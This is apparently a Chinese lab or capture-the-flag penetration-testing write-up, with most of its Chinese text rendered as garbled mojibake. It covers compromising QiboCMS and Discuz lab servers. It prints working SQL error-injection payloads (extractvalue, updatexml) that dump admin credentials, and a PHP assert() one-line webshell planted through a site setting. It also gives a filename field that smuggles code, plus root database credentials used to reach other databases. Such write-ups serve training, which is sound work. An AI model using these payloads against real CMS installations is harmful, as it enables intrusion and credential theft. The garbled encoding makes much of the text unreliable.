Äú¿ÉÒÔ¾èÖú£¬Ö§³ÖÎÒÃǵĹ«ÒæÊÂÒµ¡£

1Ôª 10Ôª 50Ôª





ÈÏÖ¤Â룺  ÑéÖ¤Âë,¿´²»Çå³þ?Çëµã»÷Ë¢ÐÂÑéÖ¤Âë ±ØÌî



  ÇóÖª ÎÄÕ ÎÄ¿â Lib ÊÓÆµ iPerson ¿Î³Ì ÈÏÖ¤ ×Éѯ ¹¤¾ß ½²×ù Model Center   Code  
»áÔ±   
   
 
     
   
 ¶©ÔÄ
  ¾èÖú
ÉøÍ¸²âÊÔÈëÃÅ ¡ª¡ª ÉøÍ¸²âÊԱʼÇ
 
  3044  次浏览      28
 2019-8-20
 

 

±à¼­ÍƼö:
±¾ÎÄÀ´×ÔÓÚ¸öÈ˲©¿Í,±¾ÎÄÖ÷Òª½éÉÜÁËÒ»µÀ×ۺϵÄÉøÍ¸Ìâ£¬ÉøÍ¸²âÊԵĺËÐÄÕýÊÇÊÕ¼¯Ä¿±êϵͳµÄÐÅÏ¢£¬ÍÚ¾òÆä©¶´²¢¼ÓÒÔÀûÓá£

0x00 ǰÑÔ

±¾ÌâËãÊÇÒ»µÀ½ÏΪ×ۺϵÄÉøÍ¸Ì⣬ҪÇó¶ÔÁ½¸ö·þÎñÆ÷ϵͳ½øÐÐÉøÍ¸£¬ÕâÁ½¸ö CMS ͬÑùÄÜÔÚÍøÉÏÕÒµ½Ðí¶à©¶´£¬³£ÓÃ×÷ÉøÍ¸²âÊÔµÄÁ·Ï°°Ð»ú¡£

¸ù¾ÝÌáʾ£¬µÚ 1 ÌâÒªÇóÕÒµ½×Éѯƽ̨µÄ¹ÜÀíÔ±Õ˺ÅÃÜÂ룻µÚ 2 ÌâÐèÒªµÇ¼·þÎñÆ÷ºǫ́£¬²¢²åÈëľÂí£¬ÔÙÓÃÖйú²Ëµ¶Á¬½Ó£¬¼Ì¶øÕÒµ½ÔÚ¹ÜÀíÔ±×ÀÃæÉ쵀 flag Îļþ£»µÚ 3 ÌâÒªÇóÔÚÂÛ̳ÉçÇøµÄÊý¾Ý¿âÖÐÕÒµ½ admin ÕË»§µÄ salt Öµ¡£

ÌâÄ¿Á´½Ó£ºhttps://www.ichunqiu.com/battalion?t=2&r=54399

½âÌâÁ´½Ó£ºhttps://www.ichunqiu.com/vm/50629/1

0x01 »ñÈ¡ www.test.ichunqiu ºǫ́µÇ¼ÃÜÂë

ÀûÓà SQL ±¨´í×¢ÈëÊÇ»ñÈ¡¹ÜÀíÔ±Õ˺ÅÃÜÂëµÄ³£¼û·½·¨¡£ÔÚä¯ÀÀÆ÷ËÑË÷Æë²© CMS µÄ¿ÉÀûÓé¶´£¬ÆäÖз¢ÏÖÁËÒ»¸ö SQL ±¨´í×¢Èë©¶´£¬ÔÚ /member/special.php ÖÐµÄ $TB_pre ±äÁ¿Î´³õʼ»¯£¬Î´×÷¹ýÂË£¬ÇÒÖ±½ÓÓë´úÂë½øÐÐÆ´½Ó£¬×¢Èë·¢Éúºó¿ÉÔÚ±¨´íÐÅÏ¢Öп´µ½¹ÜÀíÔ±µÄÕ˺ÅÃÜÂë¡£ÏêÇé¿É²Î¿¼£º

Æë²©CMSÕûվϵͳSQL×¢Èë

ÏÂÃæ´ò¿ª Firefox ä¯ÀÀÆ÷£¬¸ù¾Ý©¶´ËµÃ÷ÏÈÈÎÒâ×¢²áÒ»¸öÕ˺ţº

µÇ¼ºóµã»÷ »áÔ±ÖÐÐÄ -> רÌâ¹ÜÀí -> ´´½¨×¨Ì⣬ÈÎÒâ´´½¨Ò»¸öרÌ⣺

µã»÷רÌâÃû³Æ£¬ÔÚµ¯³öµÄרÌâÒ³ÃæÖв鿴Æä URL£¬²¢¼Ç¼Ï id Öµ£¨´Ë´¦ id=27£©£º

½ÓÏÂÀ´·ÃÎÊ http://www.test.ichunqiu/member/special.php£¬²¢´ò¿ª HackBar ¹¤¾ß£¬°´ÕÕ©¶´±¨¸æÖеĸñʽÌîдºÃ URL ºÍÇëÇóÊý¾Ý¡£URL µÄ²éѯ×Ö·û´®ÌîÈë job=show_BBSiframe&id=27&type=all£¨×¢Òâ id ÖµÒªµÈÓÚÉÏÊöרÌâ ID£©£¬ÇëÇóÊý¾ÝÌîÈë SQL ±¨´í×¢ÈëµÄ payload£º

СÌùÊ¿£ºÎªÁË·½±ãʹÓà HackBar£¬¿ÉÔÚä¯ÀÀÆ÷ÓÒÉϽǵã»÷ ²Ëµ¥ -> ¶¨ÖÆ£¬½« HackBar Íϵ½¹¤¾ßÀ¸ÖС£

´Ó±¨´íÐÅÏ¢ÖеÃÖª¹ÜÀíÔ±Õ˺ÅΪ admin£¬ÃÜÂëµÄ¹þÏ£ÖµÖ»ÓÐ 26 룬Òò´ËÐÞ¸ÄһϠpayload µÄÊä³öÖµ£¬ÔÙ´Î×¢È룬±ã¿É¿´µ½ÍêÕûµÄÃÜÂë¹þϣֵΪ b10a9a82cf828627be682033e6c5878c£º

ÒÔÉÏ payload ÔÚ©¶´±¨¸æµÄ»ù´¡ÉÏÉÔ×÷Ð޸쬷ñÔòÊä³ö²»ÁËÍêÕûµÄÃÜÂë¹þÏ£¡£

¹ØÓÚ SQL ±¨´í×¢ÈëµÄ¿ÉÀûÓú¯Êý½Ï¶à£¬±¾ÌâÑ¡ÓÃÁË extractvalue() º¯Êý£º

TB_pre=qb_members where 1 and extractvalue(1,concat(0,(select concat(0x7e,username,password) from qb_members limit 1)))-- a

Ò²¿ÉÒÔÑ¡Óà updatexml() º¯Êý£º

TB_pre=qb_members where 1 and updatexml(1,concat(0,(select concat(0x7e,username,password) from qb_members limit 1)),0)-- a

ÒÔÏÂÊÇÔÚÇãÐýµÄ¹«¿ª¿ÎÖÐ×ܽá³öÀ´µÄ MySQL Êý¾Ý¿â³£ÓÃÊ®´ó±¨´íº¯Êý£¬½¨ÒéÈ¥¹Ù·½Îĵµ²éÔÄÿ¸öº¯ÊýµÄÓ÷¨£¬¶à¿´¶àÁ·£¬ÊìÄÜÉúÇÉ£º

×îºóÀûÓà MD5½âÃܹ¤¾ß ¶ÔÃÜÂë¹þÏ£Öµ½âÃÜ£¬µÃµ½ÃÜÂëÃ÷ÎÄΪ whoami!@#123£º

0x02 »ñȡĿ±ê·þÎñÆ÷ 1 ¹ÜÀíÔ±×ÀÃæµÄ FLAG ÎļþÐÅÏ¢

»ñÈ¡Á˹ÜÀíԱȨÏÞ£¬Ï൱ÓÚÍê³ÉÁË getshell µÄÒ»°ë¡£Ëæ±ãËÑËѿɷ¢ÏÖÐí¶àÓÃÓÚÆë²© CMS getshell µÄ©¶´£¬ÏÂÃæÑ¡È¡Á½¸öÎļþдÈë©¶´½øÐи´ÏÖ¡£

ºǫ́ƵµÀÒ³°æÈ¨ÐÅϢдÈëľÂí

µÚÒ»¸ö©¶´Éæ¼°Á½¸ö²Ù×÷£ºÒ»ÊÇÔÚÍøÒ³µ×²¿°æÈ¨ÐÅÏ¢ÖÐдÈëÒ»¾ä»°Ä¾Âí£¬¶þÊÇ´´½¨ÆµµÀ¾²Ì¬»¯Ò³Ã档©¶´±¨¸æÖÐδ¸ø³öÉ󼯹ý³Ì£¬±¾È˶ԴË×éºÏÈ­ÉõÊÇÅå·þ£¬ÏêÇé¿É²Î¿¼£º

Æë²©cms×îкǫ́getshell

ÏÈËÑË÷µ½Æë²© CMS µÄĬÈϵǼºǫ́Ϊ /admin/index.php£¬Ëì³¢ÊÔ·ÃÎÊ£¬·¢ÏÖºǫ́·¾¶È·ÊµÃ»Ð޸ġ£ÔÙÓÃÕ˺Šadmin ÓëÃÜÂë whoami!@#123 µÇ¼ºǫ́£º

ÒÀ´Îµã»÷ ϵͳ¹¦ÄÜ -> È«¾Ö²ÎÊýÉèÖã¬ÔÚ ÍøÒ³µ×²¿°æÈ¨ÐÅÏ¢ ÖÐдÈëÒ»¾ä»°Ä¾Âí <?php @assert($_POST['cmd']); ?> ºó±£´æÉèÖãº

ÕâÀïΪʲô²»Óô«Í³µÄÒ»¾ä»°Ä¾Âí <?php @eval($_POST['cmd']); ?> ÄØ£¿ÒòΪ CMS ¶Ô eval() º¯Êý½øÐÐÁ˹ýÂË£¬»á½«Æäת±ä³É eva l()£º

ËùÒÔ´Ë´¦ÄÜÓà assert() º¯ÊýдÈëľÂí£¬Ò²ÌåÏÖÁË CMS µÄдÈë¹ýÂ˲»ÍêÈ«¡£½Ó×ŵã»÷ ϵͳ¹¦ÄÜ -> ƵµÀ¶ÀÁ¢Ò³¹ÜÀí -> Ìí¼ÓƵµÀÒ³£¬ÔÚ ÆµµÀÒ³Ãû×Ö ´¦ÌîÉÏÈÎÒâ×Ö·û£¨´Ë´¦ÒÔ sqli ΪÀý£©£¬ÔÚ ¾²Ì¬ÎļþÃû ´¦±ØÐëÌîÉÏ .php ÎļþÃû£¬·ñÔò²Ëµ¶Á¬½Ó²»ÉÏ£¨´Ë´¦ÒÔ sqli.php ΪÀý£©£º

µã»÷ Ìá½» ºó£¬¿ÉÔÚ ÆµµÀ¹ÜÀíÒ³ Öп´µ½ËùÌí¼ÓµÄƵµÀÒ³£¬½ÓÏÂÀ´Ò»¶¨Òªµã»÷ ¾²Ì¬»¯ °´Å¥£¬²ÅÄÜÕý³£·ÃÎÊ http://www.test.ichunqiu/sqli.php£¬·ñÔòÖ»»áµ¯³ö 404 Ò³Ãæ£º

ÔÚÈ·ÈÏÄܹ»Õý³£ sqli.php Ò³Ãæºó£¬×¼±¸ Ìí¼ÓSHELL ½øÐв˵¶Á¬½Ó£º

³É¹¦Á¬½Óºó£¬ÔÚ¹ÜÀíÔ±×ÀÃæÉÏ¿´µ½ÁË flag Îļþ£º

´ò¿ª flag Îļþ¼´¿É»ñµÃ key{636bb37e}£¬Òò´ËµÚ 2 Ìâ´ð°¸¾ÍÊÇ 636bb37e£º

ǰ̨À¸Ä¿Í¶¸å×Ô¶¨ÒåÎļþÃûдÈëľÂí

µÚ¶þ¸ö©¶´ÊÇÔÚǰ̨À¸Ä¿Í¶¸åÉèÖÃÐÅÏ¢ÖÐµÄ ×Ô¶¨ÒåÎļþÃû ÊäÈë¿òÄÚ´¥·¢£¬Òò´ËÐèÒª¡°×Ô¶¨ÒåÄÚÈÝÒ³ÎļþÃû¡±µÄȨÏÞ£¬²»¹ýÎÒÃÇÒѾ­ÓÐÁ˹ÜÀíԱȨÏÞ£¬¹Ê²»±Øµ£ÐÄ´ËÎÊÌâ¡£ÏêÇé¿É²Î¿¼£º

Æë²©CMSij´¦ÈÎÒâÎļþдÈëgetshell£¨ÐèÒªÒ»¶¨È¨ÏÞ£©

Ê×ÏÈÓÃÕ˺Šadmin ÓëÃÜÂë whoami!@#123 ÔÚǰ̨µÇ¼£¬²¢µã»÷ £¡ÎÒҪͶ¸å£º

ÈÎѡһÀ¸Ä¿£¬ÔÚ ÎÒҪͶ¸å ´¦µã»÷ ·¢±í£¨´Ë´¦ÒÔÉç»áÐÂÎÅÀ¸Ä¿ÎªÀý£©£º

ÏÈÔÚ ÆäËûÉèÖà ±êǩҳÏ嵀 ×Ô¶¨ÒåÎļþÃû ÊäÈë¿òÖÐдÈëľÂí x';@assert($_POST['cmd']);//y.htm£º

ÆäÖÐ x';ÊÇΪÁ˱պϴúÂëÖеÄ×óµ¥ÒýºÅ£¬//y.htm ÊÇΪÁËʹÕûÌåÎļþÃûÓо²Ì¬ÍøÒ³µÄºó׺£¬²¢ÇÒ×¢Ê͵ôºóÃæµÄ´úÂë¡£×¢Òâ´Ë´¦²»ÄÜÓà eval() º¯Êý¹¹ÔìľÂí£¬ÓëǰÎÄÒ»Ñù»á±»¹ýÂË¡£

Ôٻص½ »ù±¾ÐÅÏ¢ ±êǩҳÏ£¬½«´ø (*) µÄ±ØÌîÐÅÏ¢ÌîºÃºóÌá½»£º

Ìá½»ºó·ÃÎÊ http://www.test.ichunqiu/data/showhtmltype.php£¬³É¹¦¿´µ½±¨´íÐÅÏ¢£º

½ÓÏÂÀ´ Ìí¼ÓSHELL ½øÐв˵¶Á¬½Ó£º

³É¹¦Á¬½Óºó£¬¿ÉÔÚ /data/showhtmltype.php Ô´ÂëÖп´µ½ËùÌí¼ÓµÄľÂí£¬Ó¡Ö¤ÁË©¶´µÄ´æÔÚ£º

²é¿´¹ÜÀíÔ±×ÀÃæÉ쵀 flag ÎļþÓëǰÎÄÒ»Ö£¬´Ë´¦²»ÔÙ׸Êö¡£

0x03 »ñÈ¡ bbs.test.ichunqiu Êý¾Ý¿âÖÐ admin µÄ salt Öµ

µÚ 3 ÌâÖÕÓÚÒýÈëÁË http://bbs.test.ichunqiu ÂÛ̳ÉçÇø...µÄÊý¾Ý¿âÁË¡£³öÌâÈ˺ÃÏñΪÁË·½±ãÎÒÃÇÖ±½Ó½øÐб¾Ìâ£¬ÌØÒâÔÚÖ÷Õ¾¸ùĿ¼Ï·ÅÁËľÂí /2.php£¬ÃâÈ¥ÁËÉÏÌâ²åÈëľÂíµÄ¹ý³Ì£º

ËùÒÔÏ´ÎÏëÖ±½Ó¸´ÏÖµÚ 3 Ì⣬Óò˵¶Á¬ÉÏ´ËľÂí¼´¿É£º

ÎÒÃÇÔÚ¸ùĿ¼Ï¿ɿ´µ½ /dedecms_bak µÄÎļþ¼Ð£¬½øÒ»²½ËÑË÷µ½ DEDECMS µÄĬÈÏÊý¾Ý¿âÅäÖÃÎļþΪ /data/common.inc.php£¬´ò¿ªÒ»¿´£¬¹û²»ÆäÈ»£º

µ«ÊÇÖ÷»úµØÖ·ÏÔʾΪ 172.16.12.3£¬¸ú http://bbs.test.ichunqiu ºÃÏñûʲô¹ØÏµ°É£¿Æäʵ²»È»£¬´ò¿ªÖ÷»úÖÕ¶Ë£¬Óà nslookup ÃüÁî¿ÉµÃµ½ÂÛ̳µÄ IP µØÖ·¾ÍÊÇ 172.16.12.3£¬Ë³±ã¿É¿´µ½Ö÷Õ¾µÄ IP µØÖ·Îª 172.16.12.2£º

×¢Òâµ½Êý¾Ý¿âÅäÖÃÐÅÏ¢ÖÐÊǸùÓû§È¨ÏÞ£¬Òò´ËÈôÄÜÁ¬ÉÏ DEDECMS ÔÚ 172.16.12.3 ÉϵÄÊý¾Ý¿â£¬ÄÇô Discuz! ÔÚ 172.16.12.3 ÉϵÄÊý¾Ý¿âÒ²Äܱ»·ÃÎʵ½£¡ÓÚÊÇ£¬Ôڲ˵¶ Ìí¼ÓSHELL µÄÅäÖÃÖÐÌîÈëÊý¾Ý¿âÐÅÏ¢£¨THUPL£©£º

СÌùÊ¿£ºÈçºÎÔڲ˵¶ÖÐÌîÈëÊý¾Ý¿âÅäÖÃÐÅÏ¢Çë²Î¿¼ ºÚÕ¾ÀûÆ÷-Öйú²Ëµ¶µÄ¹¦ÄܽéÉܺÍʹÓ÷½·¨

<T>mysql</T>
<H>172.16.12.3</H>
<U>root</U>
<P>opiznmzs&**(</P>
<L>gbk</L>

±£´æÉèÖúóÓÒ¼üÌõÄ¿£¬Ñ¡Ôñ Êý¾Ý¿â¹ÜÀí£¬³É¹¦Á¬½Óºó¿É¼û·þÎñÆ÷¶ËµÄÊý¾Ý¿â¹ÜÀí½çÃæ£º

ÓÖ¾­¹ýÒ»·¬ËÑË÷£¬µÃÖª ultrax ÕýÊÇ Discuz! µÄÊý¾Ý¿â£¬¶ø dedecms ÏÔ¶øÒ×¼ûÊÇ DEDECMS µÄ¡£ÎÒÃǵÄÄ¿±êÓ¦¸ÃÊÇ ultrax Êý¾Ý¿âÖÐij¸ö±íµÄ salt ×ֶΣ¬ÕâÀï±ØÐëÒª½éÉÜһϠMySQL ×Ô´øµÄ information_schema Êý¾Ý¿â£¬ËüÌṩÁ˶ÔÔªÊý¾ÝµÄ·ÃÎÊ·½Ê½£¬ÊÇ MySQL ÖеİٿÆÈ«Ê飬ÆäÖÐÔÚ information_schema.COLUMNS ±íÖмǼÁ˱¾Êý¾Ý¿âËùÓÐ×ֶεÄÏà¹ØÐÅÏ¢¡£ÏêÇé¿É²Î¿¼£º

MySQLÖÐinformation_schemaÊÇʲô

Òò´Ë£¬Ö»ÒªÊäÈëÒ»Ìõ¼òµ¥µÄ SQL Óï¾ä£¬µã»÷ Ö´ÐУ¬ÓÐ¹Ø salt ×ֶεÄËùÓÐÐÅÏ¢½«»á³ÊÏÖ£º

SELECT * FROM COLUMNS WHERE COLUMN_NAME = 'salt'

×îÖÕÎÒÃÇÔÚ ultrax Êý¾Ý¿âµÄ pre_ucenter_members ±íÖз¢ÏÖÁË salt ×ֶεÄֵΪ 9b47b6£º

µ½´ËΪֹ£¬±¾´ÎÉøÍ¸²âÊÔµÄÖ¸¶¨ÈÎÎñÒÑ´ï³É¡£

ÒâÓÌδ¾¡µÄ¸÷λ¿´¹Ù¿É½Ó×ÅÍùÏ¿´£¬¼ÈÈ»ÎÒÃÇ°Ñ 172.16.12.3 ÉϵÄÊý¾Ý¿â¸ø±¬ÁË£¬ÄÇÒ²³Ã´Ë»ú»á£¬²»·Á°Ñ 172.16.12.2 ÉϵÄÊý¾Ý¿âÒ²¸ø±¬ÁË¡£¾­¹ýËÑË÷ºó·¢ÏÖ£¬Æë²© CMS µÄĬÈÏÊý¾Ý¿âÅäÖÃÎļþΪ /data/mysql_config.php£º

È»ºóÔڲ˵¶ Ìí¼ÓSHELL µÄÅäÖÃÖÐÐÞ¸ÄÊý¾Ý¿âÐÅÏ¢£º

³É¹¦Á¬½Óºó£¬ÔÚ qibov7 Êý¾Ý¿âµÄ qb_members ±íÖз¢ÏÖµÚ 1 ÌâÖйÜÀíÔ±µÄÕ˺ÅÓëÃÜÂë¹þÏ£Öµ£º

ÖÁ´Ë£¬±¾ÌâÁ½¸ö·þÎñÆ÷ÖеÄÊý¾Ý¿âϵͳÒѱ»ÎÒÃÇ´ò´©¡£»¹Ïë¼ÌÐøÉîÍÚµÄÅóÓÑ£¬½¨ÒéÈ¥³¢ÊÔ»ñµÃÂÛ̳ÉçÇøµÄ webshell£¬²¢Í¨¹ýÌáȨ»ñµÃÁ½¸ö·þÎñÆ÷ϵͳµÄ×î¸ßȨÏÞ£¬´ïµ½ÍêÈ«¿ØÖƵÄ×îÖÕÄ¿µÄ¡£

0x04 С½á

±¾ÌâËäÈ»ÓÐÁ½Ì¨Ä¿±ê·þÎñÆ÷£¬µ«Íò±ä²»ÀëÆä×Ú£¬ÊìÁ·Ö®ºó×ÔÈ»µÃÐÄÓ¦ÊÖ¡£Ôڴ˹ý³ÌÖУ¬ÎÒͬÑùÒ²ÊÜÒæ·Ëdz£¬Ï¸ÐĵĶÁÕ߻ᷢÏÖÈ«ÎĶà´Î³öÏÖ¡ºËÑË÷¡»¶þ×Ö£¬¶øÉøÍ¸²âÊԵĺËÐÄÕýÊÇÊÕ¼¯Ä¿±êϵͳµÄÐÅÏ¢£¬ÍÚ¾òÆä©¶´²¢¼ÓÒÔÀûÓá£

   
3044 ´Îä¯ÀÀ       28
 
Ïà¹ØÎÄÕÂ

iOSÓ¦Óð²È«¿ª·¢£¬Äã²»ÖªµÀµÄÄÇЩÊÂÊõ
Web°²È«Ö®SQL×¢Èë¹¥»÷
ÒÆ¶¯APP°²È«ÔÚÉøÍ¸²âÊÔÖеÄÓ¦ÓÃ
´ÓGoogle±¸·Ý»¥ÁªÍø¿´¡°Êý¾Ý°²È«¡±
 
Ïà¹ØÎĵµ

web°²È«Éè¼ÆÓë·À»¤
»¥ÁªÍøº£Á¿ÄÚÈݰ²È«´¦Àí¼¼Êõ
ºÚ¿Í¹¥»÷Óë·À·¶¼¼Êõ
WEBºÚºÐ°²È«¼ì²â
 
Ïà¹Ø¿Î³Ì

WEBÍøÕ¾ÓëÓ¦Óð²È«Ô­ÀíÓëʵ¼ù
webÓ¦Óð²È«¼Ü¹¹Éè¼Æ
´´½¨°²È«µÄJ2EE WebÓ¦ÓôúÂë
ÐÅÏ¢°²È«ÎÊÌâÓë·À·¶